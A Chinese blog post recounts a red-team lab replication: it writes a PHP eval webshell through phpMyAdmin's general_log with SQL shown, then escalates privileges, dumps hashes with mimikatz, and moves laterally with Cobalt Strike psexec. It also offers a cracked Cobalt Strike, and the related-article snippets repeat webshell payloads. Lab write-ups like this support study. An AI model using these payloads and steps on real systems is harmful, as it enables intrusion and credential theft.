实验篇 安服杯(内部赛)复现

最新推荐文章于 2024-08-13 14:54:57 发布
最新推荐文章于 2024-08-13 14:54:57 发布
阅读量195 收藏
点赞数 2
分类专栏: 原理实验 文章标签: php mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46203060/article/details/120050426
版权

我是小白——这很明显了

一,环境搭建

安服杯的环境是在ATT&CK红队评估实战靶场二的基础上搭建的,下面简单讲一下复现思路。

1网络配置

在ATT&CK红队评估实战靶场二的基础上,将WEB和PC的非域内的网卡设置为桥接模式,并将两台主机的网卡ipv4都设置为随机分配IP。
下面的DNS配置随意即可,设置为10.10.10.10也可以。
在这里插入图片描述

2补充内容

安装phpstudy和yxcms,php选用php5.5.9,phpmyadmn选用4.8版本,mysql选用5.6版本。

3复现的环境

需要请私信,比较大就不搞公开分享了,谢谢理解

二,渗透流程

这里简单提一下吧,CS这款工具不多说了吧,需要4.3英文破解版的可以私信我。

1边界突破

(1)数据库phpmyadmin漏洞写马

首先弱口令(root,root)进去
show variables like “%general%”
set global general_log=on;# 开启日志
set global general_log_file=‘C:/phpStudy/WWW/yxcms/hack.php’;# 设置日志位置为网站目录
select “<?php eval($_POST[apple]);?>”;
在这里插入图片描述

利用pl向数据库写马即可,然后蚁剑连接。

(2)任意文件写入

首先弱口令进入后台,admin,123456
在这里插入图片描述

在前台模板传马,并连接

在这里插入图片描述

2内网渗透

(1)域内信息收集

上线后与WEB靶机进行交互,查看域环境:

shell net time /domain

在这里插入图片描述

(上图为例子)
查看网络配置,发现WEB靶机配置有双网卡,存在内网环境

shell ipconfig
在这里插入图片描述
使用命令

net computers

查看网络环境中存活的机器,得到如下三个结果
在这里插入图片描述

(2)权限提升&HashDump

之后尝试导出NTLM Hash,首先使用MS15-051进行提权
在这里插入图片描述(上图截取自大佬博客)

获得System权限的Beacon
在这里插入图片描述

使用minikatz成功导出Hash
在这里插入图片描述

3横向移动

在target处查看第二步中已发现的目标。

之后在WEB靶机上配置端口转发
在这里插入图片描述

并尝试进行横向移动,在CS的

View—>Target

下使用psexec模块尝试进行横向移动
在这里插入图片描述

注意配置好域名和Listener,点击运行后CS会执行一系列的活动,如使用mimikatz进行PTH操作,最终我们就能拿到PC靶机的Beacon

在这里插入图片描述在这里插入图片描述在这里插入图片描述

对于域控也是一样的,这里是在域控中设置了一个flag(安服杯是在每台主机里都设置了一个flag)
在这里插入图片描述

自此,三个靶机全部拿下。
链接: 大佬NB!

三,结束语

身为小白的我能为你带来一丝收获,那将是我的荣幸。

这周末在做梦
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
phpmyadmin上传Webshell总结
afei001
08-31 515
目录 1.select查询输出webshell (1)创建表并INTO OUTFILE写入一句话 (2)select ... INTO OUTFILE写入一句话 2.通过构造命令执行拿shell (1)构造命令执行 (2)命令执行使用system()函数报错解决 3.secure_file_priv值不为空解决办法 4.通过数据库日志写入webshell (1)通过查询日志写入webshell (2)通过慢查询日志写入webshell 5.菜刀连接Windows和Linux系统区别
mysql传马_Mysql的写马与提权
weixin_31289551的博客
01-18 728
密码读取直接从配置文件中读取数据库账号密码爆破账号密码读取数据库目录中的user.MYD,root后的字符串为其用户加密值,在线解密或者hashcat即可脱库利用条件:权限为rootsecure_file_priv没有具体值show global variables like '%secure_file_priv%'; 查看secure_file_priv的值secure_file_priv的值为...
phpmyadmin中写马两种思路
goddemon
09-14 3053
一,在网站根目录下 ①查select @@basedir; ②利用into outfile进行写 select '<?php eval($_POST[cmd]); ?>' into outfile 'D:\soft\phpStudy\www\xxx.php';#网站的根目录 二,利用mysql日志写文件 general log 指的是日志保存状态,ON代表开启 OFF代表关闭; general log file 指的是日志的保存路径。 show variables like '%general
PHP5.5.9整数溢出漏洞
qq_53099802的博客
05-26 2522
php5.5.9整数溢出漏洞
暴力破解+文件遍历(通过phpMyAdmin拿到shell)
Jiajiajiang_的博客
08-03 5814
公司测试地址:10.0.3.45 测试地址是内网,外网访问不了 这里暴力破解指目录暴破,对于phpMyAdmin来说,因为是弱口令这里就没有暴破,需要的话可以利用burp进行暴力破解 还有一款专门用于phpMyAdmin的破解工具,不做演示了 工具链接 链接:https://pan.baidu.com/s/1Bcdt4sMR1KDRNzj_-bG4-g 密码:rq83 今...
phpmyadmin漏洞利用general_log和general_log_file拿权限
weixin_30387799的博客
07-23 318
我们如果知道phpmyadmin和网站的绝对路径后,可以利用into outfile写马拿到权限,但是吧有新版本的mysql和一些系统设置的问题这个函数受到了secure-file-priv这个的影响而且在linux上边必须有写 W的权限。。。这个得配置系统文件,在没有拿到权限的时候没法弄。。。 可以利用general_log和general_log_file 原理:开启general_log后,...
强网杯SQL题目复现php.zip
12-17
【标题】"强网杯SQL题目复现php.zip"是一个针对网络安全竞——强网杯的解题资源包,其中包含了与SQL(结构化查询语言)相关的挑战。这个压缩包可能是为了帮助参者理解和重现比中的SQL题目而设计的,特别强调了...
正点原子列表和列表项实验复现资料
05-23
通过这个"正点原子列表和列表项实验复现资料",你可以深入理解FreeRTOS的内部工作机制,尤其是任务调度的核心部分。实际操作将帮助你更好地掌握这些知识,并能应用于实际的嵌入式项目中,提升系统效率和稳定性。
车联网+强化学习 实验复现
05-21
车联网+强化学习 实验复现图 《Spectrum Sharing in Vehicular Networks Based on Multi-Agent Reinforcement Learning》实验原图
基于Python实现的数字图像Seam Carving算法复现实验.zip
07-06
阅读Seam Carving for Content-Aware Image Resizing论文,使用python复现论文中的算法并加入到pygame模块中,使其成为一个可交互的兼顾展示过程的demo。 详细介绍参考:...
phpmyadmin 弱密码导致一句话木马上传
xyx107的博客
10-06 4628
1.打开phpmyadmin(一般防火墙不能打开) 弱密码登陆后修改变量(123.php是上传的木马文件名,上传多个木马时不要重名) 在SQL输入select "&lt;?php @_POST$eavl("pass")?&gt;"! 下面框内的;改为! 执行 连接菜刀 双击打开 很危险,改密码去了.........
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1213
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
渗透测试-getshell方法总结
Jian Sun_的博客
02-11 3202
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 2.选择数据库备份,将图马备份为a.asp 3.访问xxx/xxx/.../a.asp.
phpmyadmin SQL注入 (CVE-2020-5504) 复现
YouthBelief的博客
11-11 3901
phpmyadmin SQL注入 (CVE-2020-5504)phpmyadmin SQL注入 (CVE-2020-5504)0x01 漏洞描述0x02 影响范围0x03 漏洞复现漏洞利用0x04 漏洞修复 phpmyadmin SQL注入 (CVE-2020-5504) 0x01 漏洞描述 phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞
文件上传-.user.ini利用
最新发布
feiwujiushiwo的博客
08-13 218
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
zabbix的setup无法进入第二步
houduanq的博客
08-11 468
chmod: 无法访问"/var/lib/php/session": 没有那个文件或目录。
thinkphp漏洞之sql注入漏洞-builder处漏洞
banliyaoguai的博客
08-09 577
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 322
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
PHP图书借阅微信小程序系统源码
2401_84414018的博客
08-12 214
图书借阅微信小程序”不仅是一个借阅工具,更是你探索知识、享受阅读的得力助手。在这个快节奏的时代,让我们一起慢下来,用阅读滋养心灵,开启一段段美妙的阅读旅程吧!快来加入我们,发现更多阅读的乐趣和惊喜!📚🌟。
tranformer网络如何复现实验
07-11
复现Transformer网络的实验,你需要进行以下步骤1. 数据准备:选择适合的数据集,并进行预处理,例如分词、标记化等。确保集被划分为训练集、验证和测试集。 2. 构建模型:按照Transformer的架构,构建模型的编码器和解码器部分。编码器和解码器都由多个层堆叠而成,每个层都包含多头自注意力机制和前馈神经网络。 3. 定义损失函数:选择适当的损失函数,例如交叉熵损失函数,在目标序列上计算模型输出与真实标签之间的差异。 4. 训练模型:使用训练数据集,将数据输入模型中,通过反向传播算法来更新模型的参数。可以使用优化器(如Adam)来调整学习率。 5. 模型评估:使用验证数据集评估模型的性能。计算评价指标,如准确率、BLEU分数等,来衡量模型生成序列的质量。 6. 超参数调优:根据实验结果,调整模型的超参数,包括学习率、批次大小、隐藏单元数等,以获得更好的性能。 7. 测试模型:使用测试数据集评估模型的泛化能力。检查模型在新数据上的性能,验证模型是否能正确生成预测序列。 8. 结果分析:分析模型生成序列的质量,并根据需求进行改进和调整。 请注意,以上步骤仅为一般性指导,具体实现可能因应用场景和数据集的不同而有所变化。复现Transformer网络的实验需要一定的编程和机器学习基础知识。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值